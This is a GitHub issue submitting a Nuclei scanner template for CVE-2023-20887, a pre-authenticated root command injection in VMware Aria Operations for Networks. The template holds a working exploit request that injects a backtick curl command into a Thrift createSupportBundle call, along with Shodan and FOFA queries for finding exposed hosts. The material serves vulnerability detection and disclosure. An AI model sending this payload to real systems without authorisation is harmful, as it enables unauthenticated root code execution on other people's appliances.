### ISSUE TITLE
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE (cve-2023-20887)

### ISSUE THREAD

**Issue by sinsinology** [projectdiscovery/nuclei-templates#7403]
### Template Information:
Hello Nuceli team, here is the template for cve-2023-20887, technical details are on my blog:

VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE (cve-2023-20887)
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

### Nuclei Template:

```yaml
id: vmware-vrni-rce

info:
  name: VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE (cve-2023-20887)
  author: sinsinology
  severity: high
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
    a malicious actor can get remote code execution in the context of 'root' on the appliance.
    VMWare 6.x version are vulnerable.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html
    - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"VMware vRealize Network Insight"
    fofa-query: title="VMware vRealize Network Insight"
  tags: vmware,rce,msf


http:
  - raw:
      - |-
        POST /saas./resttosaasservlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-thrift

        [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl {{interactsh-url}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'createSupportBundle'

      - type: status
        status:
          - 200
```
